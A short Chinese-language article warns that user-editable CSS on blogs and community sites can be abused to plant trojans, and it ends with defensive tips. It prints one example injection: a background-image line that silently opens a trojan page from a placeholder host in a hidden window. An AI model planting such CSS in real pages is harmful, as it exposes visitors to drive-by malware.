CSS可以用來(lái)編寫(xiě)網(wǎng)頁(yè)特效，但說(shuō)到CSS可以掛木馬，你是不是有點(diǎn)不信？隨著web2.0的普及，網(wǎng)頁(yè)形式日新月異，許多可以自定義CSS的wiki、網(wǎng)站、社區(qū)、博客日益增多。這也就成了掛馬黑客們的溫床。這些黑客往往借著網(wǎng)民們對(duì)大網(wǎng)站的信賴，在自己的博客或其他頁(yè)面中植入木馬，欺騙訪問(wèn)的用戶。一般黑客在CSS中注入木馬的方式很簡(jiǎn)單，就是將木馬放到指定的位置，然?后利用body、background-image等方式調(diào)用背景圖片，或者在調(diào)用的命令中插入T代碼，形成：
background-image: url(t:open("http://www.X.com/muma.htm"，"newwindow"，"border="1" Height=0， Width=0， top=1000， center=0， toolbar=no，menubar=no， scrollbars=no，resizable=no，location=no，status=no"))
這種中病毒的癥狀一般是不易被發(fā)現(xiàn)的，往往只是表現(xiàn)為打開(kāi)了一個(gè)空白網(wǎng)頁(yè)，或者網(wǎng)頁(yè)悄悄在后臺(tái)運(yùn)營(yíng)，干脆讓用戶看不到。所以，為了預(yù)防CSS病毒和木馬，大家應(yīng)該至少做到以下幾條：1、安裝防病毒軟件，在打開(kāi)來(lái)路不明文件時(shí)一定要掃描，在軟件有提示時(shí)一定慎重選擇操作。    2、不要隨意訪問(wèn)陌生網(wǎng)頁(yè)，盡量屏蔽網(wǎng)頁(yè)自動(dòng)打開(kāi)的窗口；    3、經(jīng)常更新系統(tǒng)漏洞文件；    4、過(guò)濾比較敏感的CSS內(nèi)容，如 emiao1:expression(this.src="about:blank"，this.outerHTML="");